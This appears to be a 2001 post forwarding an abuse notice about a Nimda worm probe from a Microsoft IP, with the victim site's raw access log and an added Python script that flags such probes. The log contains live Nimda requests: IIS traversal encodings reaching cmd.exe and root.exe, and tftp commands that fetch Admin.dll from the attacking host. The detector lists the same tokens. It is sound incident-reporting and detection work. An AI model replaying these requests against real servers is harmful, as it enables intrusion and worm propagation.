This mail was sent to Microsoft after detecting a NIMDA probe from a Microsoft IP. The IP is not MSN.com or a subsidiary, but Microsoft's corporate network.
- ---------- Forwarded message ----------
Date: 25 Dec 2001 03:34:36 -0000
To: a-rickst@microsoft.com (Admin)
From: security@prettyplease.org (Early Bird)
Cc: abuse@MICROSOFT.COM (Abuse)
Subject: Nimda Worm intrusion attempt via your network (208.229.100.126)

You are receiving this notice since your address is listed as the contact in the ARIN database for IP address 208.229.100.126.

The following Nimda Worm intrusion attempt was made against PRETTYPLEASE.ORG.

DATE/TIME: Dec-25-2001 (03:34:35) [UTC]
SOURCE   : 208.229.100.126:1784
DEST     : 208.37.215.234
ATTEMPT  : /scripts/root.exe?/c+dir

Please advise your user that their system has been compromised and is being actively utilized as an attack launchpoint against other systems.

Thank you for your prompt attention to this matter.

- -Early Bird v2.6 (http://www.treachery.net/earlybird/)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBPCq+PblDRyqRQ2a9AQE9KQP9FGoDiI5+Jrq1eDMj1wyqq4iih9zn4/qe
HR1A4hZi9hlVPy3/eJq4Pi1XSR1Tkrm7wMY+8Ed+01KU88FJ40AxRe8H1L0qGiPM
//FQSX0TUPyGYDzi/CKeDMZPaNm5PJq9hM3WQRKG6yhvLOoT5TUwOwVsJ/HCQutZ
Wv5LMWv6XWw=
=HM+r
-----END PGP SIGNATURE-----
The admin of the site forwarded the relevant logs.
208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"
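As an added example (not the poster's or the site admin's tooling, and not the Early Bird software), here is a small detector that reads web-server log lines in the format above and groups the Nimda-style probes per source: the root.exe backdoor, the cmd.exe/tftp fetch of Admin.dll, and the double-encoded and overlong-UTF-8 traversal variants seen in the log. The sample log lines are constructed, with documentation-range addresses in place of the real source.

```python
import re
from urllib.parse import unquote

# Constructed sample in the shape of the forwarded log; the addresses are
# documentation ranges, not the source named in the post.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
203.0.113.7 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20203.0.113.7%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
203.0.113.7 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
203.0.113.7 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
198.51.100.9 - - [24/Dec/2001:19:50:00 -0800] "GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"
"""
# Common/combined log format: ip ident user [ts] "method path proto" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\S+)')

# What the probes reach for: the Code Red II backdoor Nimda reuses, the worm payload name,
# the tftp pull-back, and the IIS traversal encodings (double-encoded / overlong UTF-8 '\' and '/').
INDICATORS = {"root.exe": "Code Red II backdoor (root.exe)", "cmd.exe": "cmd.exe invocation",
              "admin.dll": "Nimda payload (Admin.dll)", "tftp": "tftp fetch of payload"}
TRAVERSAL_TOKENS = ("%255c", "%252f", "%25%35%63", "%%35%63", "%%35c", "%c1%1c", "%c0%af", "%c1%9c")

def classify(path):
    """Return the reasons a request path looks like a Nimda / IIS traversal probe ([] if clean)."""
    lower = path.lower()
    reasons = [f"traversal encoding {t}" for t in TRAVERSAL_TOKENS if t in lower]
    decoded = unquote(unquote(lower))  # decode twice: the IIS behaviour that %255c relied on
    if "../" in decoded or "..\\" in decoded:
        reasons.append("traversal after double decode")
    reasons += [label for needle, label in INDICATORS.items() if needle in decoded]
    return reasons

def scan(log_text):
    """Group probe hits per source IP: count, first/last timestamp, status codes and reasons."""
    report = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        reasons = classify(m["path"])
        if not reasons:
            continue  # ordinary traffic
        e = report.setdefault(m["ip"], {"hits": 0, "first": m["ts"], "last": m["ts"],
                                        "statuses": set(), "reasons": set()})
        e["hits"] += 1
        e["last"] = m["ts"]
        e["statuses"].add(m["status"])
        e["reasons"].update(reasons)
    return report
```

Running `scan(SAMPLE_LOG)` yields one entry for the probing host with four hits and the time span of the scan, which is exactly the material an abuse notice like the one above needs; the browsing host is not reported.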